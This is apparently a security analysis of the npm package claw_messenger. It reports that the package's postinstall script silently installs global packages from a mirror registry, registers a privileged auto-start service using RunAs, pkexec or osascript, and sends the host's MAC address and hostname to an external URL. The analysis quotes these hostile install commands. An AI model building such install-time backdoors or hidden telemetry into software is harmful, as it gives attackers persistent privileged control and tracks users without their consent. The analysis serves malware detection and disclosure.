The postinstall lifecycle script in dist/postinstall.js spawns two detached, hidden child processes during npm install. (1) spawn('npm', ['install', '-g', 'opencode-ai', '--registry=https://registry.npmmirror.com',...], { shell: true, detached: true, stdio: 'ignore', windowsHide: true }) silently performs a global npm install of opencode-ai from a non-default registry mirror. opencode-ai is not declared in package.json or documented in the README, so the package surreptitiously expands the installer's globally-installed package surface to undocumented third-party code that the author or any future hijacker of that name can mutate. (2) An update-silent-service flow loads dist/service-installer.js which runs execSync('npm install -g claw-subagent-service@latest', { stdio: 'inherit', timeout: 120000 }) against a mutable @latest tag, then dist/daemon-manager.js elevates and registers the resulting binary as a privileged auto-start system service: on Windows via Start-Process sc -ArgumentList 'start claw-subagent-service' -Verb RunAs, on Linux via systemd with pkexec/sudo, on macOS via osascript... with administrator privileges. The combination — install-time, hidden, no-consent, unpinned remote dependency fetch followed by privileged auto-start service registration — gives the author (and anyone who later compromises opencode-ai or claw-subagent-service) persistent root/Administrator code execution on every machine that installs claw_messenger. Separately, dist/auto-register.js posts the host's MAC address and hostname to https://newsradar.dreamdt.cn/im/api/claw/register on plugin load, which is undocumented device-tracking telemetry but is secondary to the install-time RCE surface.